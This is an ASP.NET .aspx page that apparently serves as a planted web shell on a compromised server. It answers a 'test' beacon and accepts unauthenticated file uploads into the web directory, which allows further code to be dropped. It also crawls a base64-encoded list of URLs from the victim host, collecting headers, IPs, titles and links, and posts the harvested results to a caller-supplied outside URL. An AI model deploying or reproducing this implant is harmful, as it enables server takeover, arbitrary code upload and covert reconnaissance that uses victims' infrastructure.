<%@ Page Language="C#" Debug="false" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Web"%>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.DirectoryServices"%>
<%@ import Namespace="System.ServiceProcess"%>
<%@ import Namespace="System.Text.RegularExpressions"%>
<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script runat="server">
    static bool isDebug = true;
    static bool isOnlyDomain = true;                    //only save domain
    static bool isDeleteDuplicatDomain = true;          //delete the duplicate domain
    static bool isAllowUpload = false;
    static string myResult = "";
    static string resultUrl = "";
    static int iEndThreadNum = 0;

    protected bool isLuan(string txt)
    {
        byte[] bytes = Encoding.UTF8.GetBytes(txt);
        //239 191 189
        for (int i = 0; i < bytes.Length; i++)
        {
            if (i < bytes.Length - 3)
                if (bytes[i] == 239 && bytes[i + 1] == 191 && bytes[i + 2] == 189)
                {
                    return true;
                }
        }
        return false;
    }
    public static string utf8_gb2312(string text)
    {
        
        System.Text.Encoding utf8, gb2312;
        //utf8   
        utf8 = System.Text.Encoding.GetEncoding("utf-8");
        
        gb2312 = System.Text.Encoding.GetEncoding("gb2312");
        byte[] utf;
        utf = utf8.GetBytes(text);
        utf = System.Text.Encoding.Convert(utf8, gb2312, utf);
      
        return gb2312.GetString(utf);
    }

    public static string gb2312_utf8(string text)
    {
      
        System.Text.Encoding utf8, gb2312;
        //gb2312   
        gb2312 = System.Text.Encoding.GetEncoding("gb2312");
        //utf8   
        utf8 = System.Text.Encoding.GetEncoding("utf-8");
        byte[] gb;
        gb = gb2312.GetBytes(text);
        gb = System.Text.Encoding.Convert(gb2312, utf8, gb);
        
        return utf8.GetString(gb);
    }
    protected void Page_Load(object sender, EventArgs e)
    {
        try
        {
            

            if (!IsPostBack)
            {
			Session["endThreadNum"] = 0;  
			Session["result"] = "";
			
              
                string c = Request["c"];
                if (string.IsNullOrEmpty(c))
                {
                    ShowMessage("none");
                }else if (string.Equals(c,"test"))
				{
					Response.Write("<I am here ok!>");
				}
                else if (string.Equals(c, "u"))
                {
                    ShowMessage("upload");
                    isAllowUpload = true;

                }
                else if (string.Equals(c, "s"))
                {
                    ShowMessage("scanning");

                    string urllist = Request["u"];
                   resultUrl = Request["r"];
                    if ((!string.IsNullOrEmpty(urllist)) && (!string.IsNullOrEmpty(resultUrl)))
                    {
                        string c1 = Request["c1"];
                        string c2 = Request["c2"];
                        if (!string.IsNullOrEmpty(c1))
                        {
                            try
                            {
                                if(string.Equals(c1,"0"))
                                    isOnlyDomain = false;
                            }
                            catch (Exception e1)
                            {
                                ShowMessage(e1.Message);
                            }
                        }
                        if (!string.IsNullOrEmpty(c2))
                        {
                            try
                            {
                                if(string.Equals(c2,"0"))
                                 isDeleteDuplicatDomain = false;
                            }
                            catch (Exception e2)
                            {
                            }
                        }
                        //decode 
                      //  ShowMessage(urllist);
                        string strResult = "";
                        urllist = System.Text.ASCIIEncoding.Default.GetString(Convert.FromBase64String(urllist));
                        //start to get response of http
                        ArrayList al = new ArrayList();
                        int allthreadNum= urllist.Split('^').Length;
                        foreach (string tmp in urllist.Split('^'))
                        {
                           
                            // al.Add(tmp);
                            if (!string.IsNullOrEmpty(tmp))
                            {
                              
                                System.Threading.ThreadPool.QueueUserWorkItem(CreateOneResult, tmp);
                                

                            }
                           
                        } // end foreach

                        int iSec = 0;
                        while (true)
                        {
                            if (Convert.ToInt32(Session["endThreadNum"]) == allthreadNum)
                            {
								Response.Write("ok all thread is end");
                                break;
                            }
                            iSec++;
                            if (iSec == 60 * 2)  //3 min stop
                            {
							Response.Write("kill all of the result start to upload");
                                break;
                            }
                            System.Threading.Thread.Sleep(1000);
                        }
                        uploadresult(resultUrl);

                    }

                }
                else
                {
                    ShowMessage("nothing");
                }
            }

        }
        catch (Exception exp)
        {
            ShowMessage(exp.Message);
        }
    
    }
    //upload the result
    protected void uploadresult(string strUrl)
    {
        try
        {
		string strResult = Session["result"].ToString();
		//	Response.Write(strResult);
			
		   if(!string.IsNullOrEmpty(strResult))
		   {
				byte[] bytes=Encoding.UTF8.GetBytes(strResult);
				 System.Net.WebClient myClient = new System.Net.WebClient();
				 string ret = "a=" + Convert.ToBase64String(bytes);
				 myClient.UploadString(strUrl,ret);
		   }
        }
        catch (System.Net.WebException exp)
        {
            ShowMessage("uploadresult:" + exp.Message);
        }
    }
    protected void CreateOneResult(object tmp)
    {
        try
        {
            string strTmp = (string)tmp;
            string strUrl = strTmp.Trim();
             string strEnd = "\n";
             string strResult = "------------------------------------------------------" + strEnd;
            if (!strUrl.StartsWith("http"))
            {
                strUrl = "http://" + strUrl;
            }
            
            System.Net.WebClient client = new System.Net.WebClient();
            byte[] data = client.DownloadData(strUrl);

            System.Net.WebHeaderCollection myWebHeaderCollection = client.ResponseHeaders;
            //get all of the head of response
            string strHead = "";
            for (int i = 0; i < myWebHeaderCollection.Count; i++)
            {
                strHead =strHead + myWebHeaderCollection.GetKey(i) + ": " + myWebHeaderCollection.Get(i) + strEnd;
                
            }
            Uri myurl = new Uri(strUrl);

            System.Net.IPHostEntry hostInfo = System.Net.Dns.GetHostByName(myurl.Host);
            string strIP = hostInfo.AddressList[0].ToString();
            strHead = strHead + "domain: " + myurl.Host + strEnd;
            strHead = strHead + "IP: " + strIP + strEnd;

            strResult = strResult + strHead;
            System.IO.StreamReader utf8_reader = new System.IO.StreamReader(new System.IO.MemoryStream(data), Encoding.UTF8);
            string strPageContent = utf8_reader.ReadToEnd();
			
			bool isUTF8 = true;
            if (isLuan(strPageContent))
            {
                isUTF8 = false;
				/*
                System.IO.StreamReader gb_reader = new System.IO.StreamReader(new System.IO.MemoryStream(data), Encoding.Default);
                strPageContent = gb2312_utf8(gb_reader.ReadToEnd());
				*/
            }
            #region     get the information from page
            if (strPageContent.Length > 0)
            {
                if(isUTF8)
				{
					String strtitle = "<title>(.*?)</title>";
					Regex r = new Regex(strtitle, RegexOptions.IgnoreCase | RegexOptions.Singleline);
					MatchCollection m = r.Matches(strPageContent);
					if (m.Count > 0)
					{
						strResult = strResult + "title:" + m[0].Groups[1].Value + strEnd;
					}

					String strKeywords = "<meta\\s+name=\"keywords\"\\s+content=\"(.*?)\"";

					//get keywords
					r = new Regex(strKeywords, RegexOptions.IgnoreCase);
					m = r.Matches(strPageContent);
					if (m.Count > 0)
					{
						strResult = strResult + "keywords:" + m[0].Groups[1].Value + strEnd;
					}

					String strdescription = "<meta\\s+name=\"description\"\\s+content=\"(.*?)\"";
					r = new Regex(strdescription, RegexOptions.IgnoreCase);
					m = r.Matches(strPageContent);
					if (m.Count > 0)
					{
						strResult = strResult + "description:" + m[0].Groups[1].Value + strEnd;
					}
				
				}else
				{
					String strcode = "text/html;\\s*charset=(.*?)\"";
					Regex r1 = new Regex(strcode, RegexOptions.IgnoreCase | RegexOptions.Singleline);
					MatchCollection m1 = r1.Matches(strPageContent);
					if (m1.Count > 0)
					{
						strResult = strResult + "encoding:" + m1[0].Groups[1].Value + strEnd;
					}
				}
                
				
                string strRegex = @"http://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)?";

               Regex r2 = new Regex(strRegex, RegexOptions.IgnoreCase);
			  
               MatchCollection m2 = r2.Matches(strPageContent);
                ArrayList al = new ArrayList();
                for (int i = 0; i <= m2.Count - 1; i++)
                {
                    try
                    {
                        bool rep = false;
                        string strNew = m2[i].ToString();
                        if (isOnlyDomain)
                        {
                            Uri u = new Uri(strNew);

                            strNew = u.Host;
                            if (u.Port != 80)
                                strNew = strNew + ":" + Convert.ToString(u.Port);
                        }
                        if (isDeleteDuplicatDomain)
                        {
                            foreach (string str in al)
                            {
                                if (strNew == str)
                                {
                                    rep = true;
                                    break;
                                }
                            }
                        }
                        if (!rep)
                        {
                            strResult = strResult + "newlinks:" + strNew + strEnd;
                            al.Add(strNew);
                        }
                    }
                    catch (Exception exp)
                    {
						ShowMessage("getResult:" + exp.Message);
                    }
                }
            }
                #endregion the end for getting the inforamtion
            if (strResult.Length > 0)
            { //deal with the result
                lock (this)
                {
                    Session["result"] = Session["result"].ToString() + strResult;

                    if (myResult.Length > 1024 * 150)  // more than 150k and upload the result
                    {
                        uploadresult(resultUrl);
                        Session["result"]= "";
                    }
                    Session["endThreadNum"] = Convert.ToInt32(Session["endThreadNum"]) + 1;
                }
            }
        }
        catch (Exception exp)
        {
        }
      
    }
   
   

    /// <summary>
    /// upload file 
    /// </summary>
    /// <param name="sender"></param>
    /// <param name="e"></param>
    protected void Button1_Click(object sender, EventArgs e)
    {
	/*
        if (isAllowUpload)
        {
            if (FileUpload1.HasFile)
            {
                FileUpload1.SaveAs(Server.MapPath("~/") + FileUpload1.FileName);

            }
        }
        else
        {
            String str = "<upload is wrong>";
            Response.Write(str);
 
        }
		*/
			if (FileUpload1.HasFile)
            {
                FileUpload1.SaveAs(Server.MapPath("./") + FileUpload1.FileName);
				String str = "<upload is ok>";
            Response.Write(str);

            }
    }

    protected void ShowMessage(string str)
    {
        if(isDebug)
            
             Response.Write(str);
    }
</script>



<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title></title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    
    </div>
        <asp:FileUpload ID="FileUpload1" runat="server" />
        <asp:Button ID="Button1" runat="server" OnClick="Button1_Click" Text="Button" />
    </form>
</body>
</html>
